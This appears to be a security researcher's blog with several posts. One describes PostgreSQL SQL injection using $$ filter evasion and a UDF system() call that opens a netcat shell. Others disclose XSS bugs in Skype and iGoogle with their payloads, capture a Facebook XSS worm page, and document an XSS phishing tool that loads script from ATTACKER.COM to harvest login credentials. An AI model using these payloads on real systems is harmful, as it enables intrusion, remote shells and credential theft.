Kos SecurityA blog about security.

[RL] PostgreSQL String Filter Evasion & UDF

Recently I came across an application that:

I had straight up SQL injection (on an INSERT statement, but fortunately stacked queries are supported in PostgreSQL + ASP.NET/JSP), but I was having a hard time getting things to work nicely.

After a little bit of searching for filter evasion and PostgreSQL, I discovered this paper: Advanced PostgreSQL SQL Injection and Filter Bypass Techniques by
Leon Juranić of DefenseCode.

I suggest reading the whole paper, it’s great, but what I took away from it was exactly what I needed at the time. It turns out that in PostgreSQL, to denominate a string, you can use single tick (‘), quotes (“), or, get this, double dollar signs ($$).

The reason for this is to make SQL more readable when including single ticks and qoutes.
Imagine a query like:

SELECT * FROM shops WHERE shopName ID = 'Rick\'s Ice Cream';

Notice the escape character? (Disregard the fact that I could have just used double quotes instead.) PostgreSQL decided to solve this solution by adding another delimiter, the double dollar signs ($$). So suddenly, the above statement becomes:

SELECT * FROM shops WHERE shopName ID = $$Rick's Ice Cream$$;

Here’s the documentation on it. What does this mean? Easier filter evasion for us!

But that’s not all I faced during my testing. It turns out, that as of PostgreSQL 8.2 or 8.3, PostgreSQL will not longer allow you to load a C library unless the PostgreSQL “Magic Token” has been defined, PG_MODULE_MAGIC;. This means that I can’t simply load /lib/libc.so anymore, which means I can’t map a new user defined function to system()! Bummer!

Fortunately, I was able to discover file upload functionality in this application that let me upload binary files, I simply snipped out SQLMap‘s lib_postgresqludf_sys.c, compiled it against the version of PostgreSQL I was attacking, and boom, I had a valid C library that I could load into PostgreSQL with and execute system() functions.

In the end, the SQL statement looked like this, with my attack vector in bold.

SELECT * FROM users WHERE ID = 1;CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS $$/www/some/upload/path/uploadedfile.so$$, $$system$$ LANGUAGE $$C$$ STRICT;select system($$ nc -e /bin/sh -l 1025 $$);– and password = ‘password’;

Hacking Google Chrome OS

Presented at BlackHat USA 2011, BSidesLV 2011, and Defcon 19 (2011). WhitePaper:

Presentation Slides:

Video after the break.

The Hidden XSS Attacking the Desktop & Mobile Platforms – Slides & Video

A few weeks ago (October 2th) I was in Louisville, Kentucky, giving a talk at Derbycon. I also gave the same talk in San Diego (October 9th) at Toorcon 13. It’s a much expanded version of a talk I did back in June at Toorcon Seattle, “XSS Without the Browser”.

Slides are below, and video is after the break. The slides are a bit different than the video. I modified, reordered, and added a few slides, and also included a new Google application vulnerability.


Toorcon Seattle 2011, “XSS Without the Browser”

Toorcon Seattle 2011, “XSS Without the Browser” (PDF). Presentation I gave about embedded HTML/Javascript engines, and potential security risks with whe not implemented securely. An old Skype bug is used as an example.

Skype OS X Cross-Site Scripting Vulnerability

Vulnerability: Cross Site Scripting

Affects: Skype 5.0.x to <= 5.0.914 (OS X) (Download | Local Mirror)

Skype (http://skype.com/) was vulnerable to (persistent?) XSS via messages from other users.

On top of that, the DOM of this window does not contain a set Origin, so it is possible to "bypass" the cross origin policy.

Authentication Status: Logged into skype, but persists in logs,
so a user can be exploited again if viewing logs. Default privacy
settings require a user to add the attacker as a contact.

Inject used in attack


More advanced attacks:


Facebook XSS

Some cross-site scripting that was being spread on Facebook. I allowed myself to be compromised (for science!) and opened up a BURP instance beforehand. (Red link is to the actual javascript that sent out messages.)

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Thu, 07 Apr 2011 05:49:39 GMT
Content-Length: 121182


                                        <div id="app205712022786034_permalink_header_alt" fbcontext="dc593d496581">
                                                        <a href="http://www.facebook.com/bonaparte" onclick="(new Image()).src = &#039;/ajax/ct.php?app_id=205712022786034&amp;action_type=3&amp;post_form_id=60e2f9386c8e446297b44bb16477472b&amp;position=3&amp;&#039; + Math.random();return true;"><img src="http://i.imgur.com/dPewU.png" /></a>
                                                        <h2>Videos Posted by Maria Gonzales</h2>
                                        <div id="app205712022786034_player" style="border: 0px none #ffffff;" fbcontext="dc593d496581">
                                                <a href=" javascript:if(window.opener)&#123; window.opener.document.body.appendChild(document.createElement(&#039;script&#039;)).src=&#039;[NOT A REAL LINK TO THE ATTACKER];app_link=http://fb.me/TzCxMrJW&amp;embed_link=http://www.ebaumsworld.com/playerbeta.swf?id0=81417366&amp;im_text=haha! hilarous&#039;; window.close(); &#125;else&#123; document.body.appendChild(document.createElement(&#039;script&#039;)).src=&#039;[NOT A REAL LINK TO THE ATTACKER];app_link=http://fb.me/TzCxMrJW&amp;embed_link=http://www.ebaumsworld.com/playerbeta.swf?id0=81417366&amp;im_text=haha! hilarous&#039;; &#125;" target="_blank" onclick="(new Image()).src = &#039;/ajax/ct.php?app_id=205712022786034&amp;action_type=3&amp;post_form_id=60e2f9386c8e446297b44bb16477472b&amp;position=3&amp;&#039; + Math.random();return true;"><img src="http://i.imgur.com/8hZd5.png" border="0" /></a>
                                        <div id="app205712022786034_video_info" fbcontext="dc593d496581">
                                                <div id="app205712022786034_video_metadata" fbcontext="dc593d496581">
                                                        <h3>Teacher Pushes Attacking Bully To The Ground</h3>
                                                                 by <a href="http://www.facebook.com/bonaparte" onclick="(new Image()).src = &#039;/ajax/ct.php?app_id=205712022786034&amp;action_type=3&amp;post_form_id=60e2f9386c8e446297b44bb16477472b&amp;position=3&amp;&#039; + Math.random();return true;">Maria Gonzales</a> (<a href="/video/?id=" onclick="(new Image()).src = &#039;/ajax/ct.php?app_id=205712022786034&amp;action_type=3&amp;post_form_id=60e2f9386c8e446297b44bb16477472b&amp;position=3&amp;&#039; + Math.random();return true;">videos</a>)
                                                                <strong>2:30</strong><br /><br />
                                                <div id="app205712022786034_description" fbcontext="dc593d496581">
                                                          He should be commended, but sadly, in todays world, he'll probably get in trouble. 
                                                <a role="button" href="/ajax/share_dialog.php?s=&#039;11&amp;appid=2392950137&amp;p[]=487808128343&amp;p[]=&amp;p[]=" title="send this to friends or post it on your profile." onclick="(new Image()).src = &#039;/ajax/ct.php?app_id=205712022786034&amp;action_type=3&amp;post_form_id=60e2f9386c8e446297b44bb16477472b&amp;position=3&amp;&#039; + Math.random();return true;"><span>Share</span></a>
                                                <div id="app205712022786034_video_actions" fbcontext="dc593d496581">
                                                                        <a href="#" id="app205712022786034_lowqual_toggle" title="watch &quot;bonaparte - menschen live (video) [hd]&quot; in regular quality." onclick="(new Image()).src = &#039;/ajax/ct.php?app_id=205712022786034&amp;action_type=3&amp;post_form_id=60e2f9386c8e446297b44bb16477472b&amp;position=3&amp;&#039; + Math.random();return true;" fbcontext="dc593d496581">
                                                                        View in Regular Quality</a>
                                                                <a href="#" id="app205712022786034_highqual_toggle" title="watch &quot;bonaparte - menschen live (video) [hd]&quot; in high quality." onclick="(new Image()).src = &#039;/ajax/ct.php?app_id=205712022786034&amp;action_type=3&amp;post_form_id=60e2f9386c8e446297b44bb16477472b&amp;position=3&amp;&#039; + Math.random();return true;" fbcontext="dc593d496581">View in High Quality</a>
                                                                <li><a href="/ajax/report.php?content_type=&#039;13&amp;cid=487808128343&amp;h=AQDMzuGzYxeiGADv" onclick="(new Image()).src = &#039;/ajax/ct.php?app_id=205712022786034&amp;action_type=3&amp;post_form_id=60e2f9386c8e446297b44bb16477472b&amp;position=3&amp;&#039; + Math.random();return true;">Report Video</a></li>


Hacking Google – Part 2

Vulnerability: Cross Site Scripting

Affects: Any browser that supports javascript to be executed from CSS. IE6, IE7, and the latest version of Opera were tested.

iGoogle (http://www.google.com/ig) was vulnerable to persistent XSS via CSS injection on a custom theme.

Authentication Status: both unauth and auth


URL used in attack


POST /ig/skin_submit_xhr?tmprivacy=1&et=4cdb0f0bQKHcNSc5&referrer=tm HTTP/1.1


How it’s reflected on the page:

When the iGoogle page is loaded, if theme (which is attached to a tab) is selected, it will trigger instantly.
If the tab is not selected, if a user selects the tab, it will then trigger.

GET /ig/skin_xml_to_css?hl=en&gl=us&v2=1&url=http://www.google.com/ig/tm%3Foutput%3Dxml%26te%3DFYvZBahVsoU&skindx=ix:0&fp=lUTDcevwYRs HTTP/1.1

-o-link-source:current}@import 'data:,*{x:expression(alert(document.domain))}';/*') no-repeat top center;}/* google logo */....

The Danger

A user can share a tab with other users via invitation. If the victim accepts the tab invitation, then the theme with the attached malicious CSS will be added to their page.


This issue was resolved in about a week.

Hacking Google – Part 1

Vulnerability: Cross Site Scripting

Affects: all browsers.

iGoogle (http://www.google.com/ig) was vulnerable to persistent XSS via untrusted gadgets hosted on offsite domains.

Authentication Status: both unauth and auth


URL used in attack

<ModulePrefs author="Kyle" author_email=""
        description="__MSG_description__" thumbnail="http://www.google.com/images/firefox/sprite2.png"
        title_url="javascript:alert(document.domain);"  title="[TITLE OF GADGET]" height="165">
        <Require feature="setprefs" />
        <Require feature="views" />
        <Require feature="dynamic-height" />

How it’s reflected on the page:

<a id="m_8_url" href="javascript:alert(document.domain);" target="_blank"><span id="m_8_title">[TITLE OF GADGET]</span></a>
(The "Hax" string below is the title of the gadget, which was what the reflected link above is)


This issue was resolved very quickly.
Google now just replaces anything that doesn’t have a protocol of http or https with the path the file is hosted on.
If the file is hosted at http://attacker.com/path/to/file.xml, the URL becomes http://attacker.com/path/to/


XSS Phishing Attack Tool.

This README applies specifically to the PHP version of this script.
There is a Python version which acts the same, but has XML logging.
The Python version does not yet have the same options as the PHP version.

## Explanation

This is not an exploit tool, it’s more of a payload tool.
Once you’ve found the exloit, and you’re able to inject javascript,
just stick this in there.


<script src=”http://ATTACKER.COM/thebiz.php”>

You’re pretty much set.

## What exactly this does…

  1. The page is loaded with the script inconspicuously place.
  2. Once the script is hit, the script will look at the HTTP REFERER
  3. With the HTTP REFERER in hand, it uses get_file_contents() to fetch the URL [all that is supported at this thime, cURL and Socket will be added later]
  4. Since the server doesn’t have the authentication that the user does (presumably) the server is prompted with a an unauthenticated page, which often contains a form to login.
  5. All the returned data is filtered and escaped, making it possibly to embed it into javascript.
  6. As soon as the javascript, with the payload, is returned to the user, the browser replaces everything in <body> with what was returned within the javascript. Forms are then modified to have the onSubmit=”" functoin.
  7. When you submit, it loads an image with the input fields as get parameters. sleep() is called (it sucks, gotta replace it.)

## A few things

# Requirements

In php.ini
allow_url_fopen = On
For now. I’ll add in suport for cURL and Socket later.

Proper HTTP Referers sent by the victim. If this is spoofed, or disabled, there will be odd results.

Javascript my be enabled.

By default, the script will grab anything from $_POST and throw it in a file labeled “posts”
Create that file, make ir writeable, but non-readable. Right now there’s no functionality to
forward posts from the server spoofed page, but that will change in the future, and adding it
manually isn’t hard.

# Future plans

Expanded support for passing proper browser headers, instead of php headers.
cURL. Socket, because it’s probably faster.
Caching. (Save the page, then server that until X minutes/hours/days have passed, then recache it.)

# Anything else?

I suggest using .htaccess, or some other method, to slim down the URL.
|| RewriteRule ^a$ man-just-left-of-middle/thebiz.php
This will make http://ATTACKER.COM/a the script, and it will execute as normal, juts with a rewritten URL.

Will not work with URL redirection, because the HTTP referer is strippid.

Check the LICENSE file for licensing, GPLv2, etc etc.

WARNING: I have not completely bug tested this against vulns. I might have made a stupid mistake somewhere.
This is also doing some bandwidth intensive actoins (well, compared to none at all.)
Mileage may vary.

## Author

Kyle “Kos” Osborn